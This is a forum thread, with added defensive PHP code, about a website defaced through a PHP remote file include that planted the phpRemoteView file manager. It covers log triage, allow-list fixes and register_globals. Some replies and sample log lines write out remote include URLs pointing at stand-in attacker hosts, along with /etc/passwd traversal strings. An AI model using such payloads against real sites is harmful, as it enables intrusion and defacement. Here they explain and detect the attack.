
10-25-2004, 01:27 PM | New Member | Join Date: Oct 2004 | Posts: 3
Website hacked, phpremoteview?
A few days ago I discovered that my main page had been changed to this:
[my homepage url]
There didn't appear to be much of anything destroyed, other than the main page changed, one of the other files had a title changed, and there was an 80k PHP file named prev.php on the server...
I read the description of it and found this site:
[php remote view url]
It appears to be some sort of GUI that shows the whole directory, and allows editing of files and such...
After the first incident, I removed the file and changed all my FTP passwords.
I started looking at server access logs and found POSTs using a "/prev.php" file, which was dated Sept 25, although I don't remember ever actually putting any file like that on there. It's rather large at around 88KB. I did a "cat" command via ssh and read the comment at the top; it said something brief about being a PHP file for editing/creating/removing files.
There are repeated POSTs in the log regarding that file, as well as index.htm, all from the same IP at about the time those files are dated.
They look kinda like this:
80.70.227.120 - - [22/Oct/2004:17:56:18 -0400] "POST /prev.php HTTP/1.1" 302 123 [homepageurl] "
[homepageurl]+prev.php?c=e&d=%2Fhomepages%2F22%2Fd107367292%2Fhtdocs%2Fandrew %2F&f=index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "-"
I don't really know all that much about web security myself... it's hosted by a remote server (1and1.com).
Anyone know how this could have happened? The message on the main page, written in illiterate English, seems to point to the "?" after the main.php.
The linking system on my webpage is setup so that it passes a "pagename" variable through the url which then opens
for example
[homepageurl] + main.php?pagename=home.php
Is this somehow exploitable? If so, how can I fix it?
I had to replace the addresses with [homepageurl]... b/c the board won't let me post links until I have 5 posts apparently.
Thanks,
Andrew

10-26-2004, 12:20 PM | Newbie | Join Date: Oct 2004 | Location: Finland | Posts: 14
I think that your site got defaced because your host hasn't upgraded their software, which had an exploit the cracker used to deface it.
If this continues I suggest that you find another host.
******.com would be a good start in my opinion.

10-26-2004, 01:13 PM | WHT Addict | Join Date: Oct 2004 | Posts: 162
Quote:
I think that your site got defaced because your host hasn't upgraded their software, which had an exploit the cracker used to deface it.
And what is your evidence here? The poster didn't say what host they were with, or what software the host ran.
Quote:
The linking system on my webpage is setup so that it passes a "pagename" variable through the url which then opens
for example
This is likely the problem. The attacker will have used ../ or / to escape from the hosted site web directory into other areas, to read other files - for example /etc/password or .htaccess files.
__________________
InsideHosts.com - examining the insides of the hosting industry.

10-26-2004, 02:30 PM | Web Hosting Master | Join Date: Dec 2001 | Location: NYC | Posts: 1,902
Quote:
Originally posted by Synaps
I think that your site got defaced because your host hasn't upgraded their software, which had an exploit the cracker used to deface it.
If this continues I suggest that you find another host.
******.com would be a good start in my opinion.
Great generalization there
__________________
██ SCHostPRO.com ██
º Powered by DirectAdmin with iTron
º Shared + Reseller Hosting
º Hosting with that special sauce

10-26-2004, 04:32 PM | Newbie | Join Date: Oct 2004 | Location: Finland | Posts: 14
"And what is your evidence here? The poster didn't say what host they were with, or what software the host ran."
well... the easiest way to deface a website is to exploit it...
doesn't matter which host you are using... it can still be exploited if the software hasn't been updated
so it was just my opinion... no need to start flaming.

10-26-2004, 04:41 PM | WHT Addict | Join Date: Oct 2004 | Posts: 162
Quote:
doesn't matter which host you are using... it can still be exploited if the software hasn't been updated
Well, obviously.
The point is that I'd suggest that posting to say a host is running old software and you move to BlahBlahHost.com as you did is a bit suspect - if you have absolutely no idea whatsoever what software the host is running.
The original poster actually says, in the last paragraph, what the security problem is - it's with their PHP script.
__________________
InsideHosts.com - examining the insides of the hosting industry.

10-26-2004, 04:53 PM | Aspiring Evangelist | Join Date: Mar 2004 | Location: Chicago, IL | Posts: 384
Re: Website hacked, phpremoteview?
Quote:
Originally posted by VHockey86
The linking system on my webpage is setup so that it passes a "pagename" variable through the url which then opens
for example
[homepageurl] + main.php?pagename=home.php
Is this somehow exploitable? If so, how can I fix it?
That is *very* exploitable. They probably used it to include a PHP injection script that gives them access to a shell. Do a grep on your logs for "cmd=" and you will likely see the abuse. The problem is they can include scripts from other hosts if you allow anything to be defined for the include, such as main.php?pagename=http://www.someothersite.com/cmd.txt?cmd=shell%20commands%20here
You need to prevent them from including just anything for pagename.
There are some things your hosting provider can do to limit the exposure of these kinds of hacks, but you still need to lock down your code as well.
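The replies above point at the same three log indicators: a parameter whose value is a URL (a remote include), `../` in a parameter (traversal), and BigGorilla's suggested grep for `cmd=`, plus the original poster's observation of POSTs to a script that was never part of the site. The script below is an added example, not code from anyone in this thread: it parses Apache "combined" log lines and reports those indicators. The log lines, the IP addresses (documentation ranges) and the inventory of the site's own scripts are constructed for the demo.

```php
<?php
// Added example: triage an Apache combined-format access log for the
// indicators discussed in the thread. Sample data is constructed.

// Scripts the site owner knows they deployed (assumption for the demo).
$knownScripts = ['/index.htm', '/main.php', '/home.php'];

// Constructed log lines in the same shape as the one posted above.
$sampleLog = <<<'LOG'
203.0.113.5 - - [22/Oct/2004:17:56:18 -0400] "POST /prev.php HTTP/1.1" 302 123 "http://www.example.com/prev.php?c=e&d=%2Fhomepages%2Fhtdocs%2F&f=index.htm" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.5 - - [22/Oct/2004:17:58:02 -0400] "GET /main.php?pagename=http://evil.example/cmd.txt?cmd=id HTTP/1.1" 200 4521 "-" "Mozilla/4.0"
198.51.100.7 - - [22/Oct/2004:18:01:40 -0400] "GET /main.php?pagename=../../../../etc/passwd HTTP/1.1" 200 1802 "-" "curl/7.12"
192.0.2.10 - - [22/Oct/2004:18:05:11 -0400] "GET /main.php?pagename=home.php HTTP/1.1" 200 3110 "http://www.example.com/" "Mozilla/5.0"
LOG;

// Split one combined-format line into its fields; null if it does not parse.
function parseCombinedLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: [^"]*)?" (\d{3}) (\S+) "([^"]*)" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'target' => $m[4],
            'status' => (int) $m[5], 'referer' => $m[7], 'agent' => $m[8]];
}

// Inspect a raw query string for the patterns the replies describe.
function queryIndicators(string $query): array
{
    $hits = [];
    if ($query === '') {
        return $hits;
    }
    parse_str($query, $params);          // also URL-decodes, so %2E%2E%2F == ../
    foreach ($params as $key => $value) {
        if (!is_string($value)) {
            continue;                    // array-valued parameters are not paths
        }
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
            $hits[] = "remote URL in parameter '$key' (remote include attempt)";
        }
        if (strpos($value, '../') !== false || strpos($value, '..\\') !== false) {
            $hits[] = "directory traversal in parameter '$key'";
        }
    }
    if (preg_match('/(^|[?&])cmd=/', $query)) {
        $hits[] = "'cmd=' present (the grep suggested above)";
    }
    return $hits;
}

// Combine the query checks with the "POST to an unknown script" check.
function triageLine(string $line, array $knownScripts): ?array
{
    $rec = parseCombinedLine($line);
    if ($rec === null) {
        return null;
    }
    $pos   = strpos($rec['target'], '?');
    $path  = $pos === false ? $rec['target'] : substr($rec['target'], 0, $pos);
    $query = $pos === false ? '' : substr($rec['target'], $pos + 1);

    $hits = queryIndicators($query);
    if ($rec['method'] === 'POST' && !in_array($path, $knownScripts, true)) {
        $hits[] = "POST to a script not in the site's inventory: $path";
    }
    // The posted log line carried the tool's parameters in the Referer, so check it too.
    $refPos = strpos($rec['referer'], '?');
    if ($refPos !== false) {
        foreach (queryIndicators(substr($rec['referer'], $refPos + 1)) as $h) {
            $hits[] = "referer: $h";
        }
    }
    if ($hits === []) {
        return null;
    }
    return ['ip' => $rec['ip'], 'time' => $rec['time'],
            'request' => $rec['method'] . ' ' . $rec['target'], 'indicators' => $hits];
}

foreach (explode("\n", $sampleLog) as $line) {
    $finding = triageLine($line, $knownScripts);
    if ($finding === null) {
        continue;
    }
    printf("%s %s %s\n", $finding['time'], $finding['ip'], $finding['request']);
    foreach ($finding['indicators'] as $indicator) {
        echo "    - $indicator\n";
    }
}
```

Run it with `php triage.php`; on a real log, replace `$sampleLog` with `file_get_contents()` of the access log and fill `$knownScripts` from the files you actually uploaded. Anything it flags that predates the defacement (here, the POST to a script that was never deployed) is where the timeline of the compromise starts.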

10-26-2004, 05:41 PM | New Member | Join Date: Oct 2004 | Posts: 3
Alright, thanks for the tip BigGorilla.
So if I was to check the variable against an array of linkable files would that remove the hole?
Something like this?
Code:
$pagename = isset($_GET['pagename']) ? $_GET['pagename'] : null;  // read the request explicitly
$links = array('home.php', 'file1.php', 'file2.php', 'file3.php', 'file4.php'); // define the array - links
if (isset($pagename)) {                          // if $pagename is set
    if (in_array($pagename, $links, true)) {     // if pagename is in the array (strict comparison)
        include($pagename);                      // include the page
    } else {                                     // if $pagename is NOT in the array
        include('403.htm');                      // display a warning
        exit();                                  // end page running
    }
} else {                                         // if $pagename is NOT set
    include('home.php');                         // include default page
}
Last edited by VHockey86; 10-26-2004 at 05:47 PM.

10-26-2004, 05:44 PM | New Member | Join Date: Oct 2004 | Posts: 3
I've also heard a lot of business about "register globals".
How exactly does that work?
Previously I never declared $pagename = $_GET['pagename'] and was told that I should initialize all variables. Is this still a problem?
I was also told to make a php.ini file in the folder and include the line
"register_globals = no"
Thanks for the help guys.
I took down the hacked homepage and stuff... so that's why you probably can't find it (if anyone was looking).
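The two posts above ask the same underlying question: how an include driven by a request parameter gets abused, and what register_globals has to do with it. The block below is an added example, not VHockey86's code or anything posted in the thread. It shows the allow-list router in the shape most worth copying (the URL carries a short key, and only a table value is ever passed to `include`) next to a small simulation of what register_globals did. The page keys, file names and the hostile request are assumptions constructed for the demo; `extract()` stands in for register_globals so the demo runs on current PHP, where that setting no longer exists.

```php
<?php
// Added example (not from the thread): an allow-list page router, and a
// demonstration of why an uninitialised variable was dangerous under
// register_globals=On. Keys and file names are assumptions for the demo.

// The request carries a key (main.php?page=about). Only the table's value
// reaches include(), so the request never contains a file name, path or URL.
const PAGES = [
    'home'  => 'home.php',
    'about' => 'file1.php',
    'links' => 'file2.php',
];
const DEFAULT_KEY = 'home';

// Map a requested key to a file; anything unknown or malformed falls back
// to the default rather than being used in any way.
function resolvePage($requested): string
{
    // $_GET values may be arrays (?page[]=x), so insist on a plain string key.
    if (is_string($requested) && array_key_exists($requested, PAGES)) {
        return PAGES[$requested];
    }
    return PAGES[DEFAULT_KEY];
}

// With register_globals=On, every request parameter (GET, POST, cookie) was
// turned into a PHP variable before the script ran. A script that tested
// $pagename without assigning it first therefore trusted whatever the client
// sent. extract() simulates that here; register_globals itself was
// deprecated in PHP 5.3 and removed in PHP 5.4.
function pageUnderRegisterGlobals(array $requestParams): string
{
    extract($requestParams);          // simulates register_globals=On
    if (isset($pagename)) {           // "set" by the request, not by this script
        return $pagename;             // in the old code this went straight into include()
    }
    return 'home.php';
}

// The safe shape: initialise the variable yourself, read the request
// explicitly from $_GET, and resolve it through the allow-list.
function pageFromRequest(array $get): string
{
    $requested = null;                // initialised here, so nothing can pre-seed it
    if (isset($get['page'])) {
        $requested = $get['page'];
    }
    return resolvePage($requested);
}

// Wiring for main.php (skipped under the CLI so the demo runs stand-alone).
if (PHP_SAPI !== 'cli') {
    include __DIR__ . '/' . pageFromRequest($_GET);
}

// CLI demo with a constructed hostile request: the first function returns the
// client's value untouched, the second returns a file from the table.
$hostile = ['pagename' => 'http://attacker.example/shell.txt', 'page' => '../../etc/passwd'];
echo "register_globals style: ", pageUnderRegisterGlobals($hostile), "\n";
echo "allow-list style:       ", pageFromRequest($hostile), "\n";
```

On the php.ini question in the post: a per-directory `php.ini` only takes effect when PHP runs as CGI (as it did on many shared hosts of that era); under mod_php the equivalent is `php_flag register_globals off` in `.htaccess`. Either way, the router above does not depend on the setting, which is the point of initialising `$requested` yourself and reading `$_GET` explicitly.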

08-06-2011, 12:27 PM | New Member | Join Date: Aug 2011 | Posts: 1
Re: Problem With Wordpress Blog wp-admin Prompt showing PHP RemoteView Login Solved!
I know that this thread is quite old, but I got a different problem with PHP RemoteView. It showed in one of my WordPress blog's wp-admin login prompt.
I have a WordPress photography blog which was running well. However, when I was logging in to the wp-admin interface, the login prompt displays the PHP RemoteView server prompt and asks for a user name and password. My admin user name and password won't work. I found out that the problem is being served by the wp-minify WordPress plugin which I installed one month before. Wp-minify is a WordPress plugin that combines and compresses JS and CSS files to improve page load time.
I tried to search Google for the problem but there is no information posted yet. I deactivated all plugins that I recently installed and re-activated the plugins one by one and found out that wp-minify is the culprit when it is activated.

08-06-2011, 08:59 PM | New Member | Join Date: Aug 2011 | Posts: 1
I just encountered the same problem with WP-minify and phpRemoteView. I can't see what set it off exactly and don't appreciate the passing panic that the site had been hacked (Google did at least inform me that phpRemoteView is sometimes injected to do just that). Maybe my reply will strengthen Google's attraction to the topic.
I deleted WP-minify, which has worked fine for a long time, and I suspect would work if reinstalled. However for now I am trying out the derivative Better WordPress Minify ("Allows you to minify your CSS and JS files for faster page loading for visitors. This plugin uses the PHP library Minify and relies on WordPress's enqueueing system rather than the output buffer (will not break your website in most cases). This plugin is very customizable and easy to use.")
I wish I'd found your post or thought of this before contacting greengeeks tech support, though they were quick to help. BTW you can reduce the pain of finding the guilty plugin by activating half, checking for error, then activating (or deactivating if the problem returned) half of that, etc. One of the few things I remember from CS, the binary search.
-- Andrew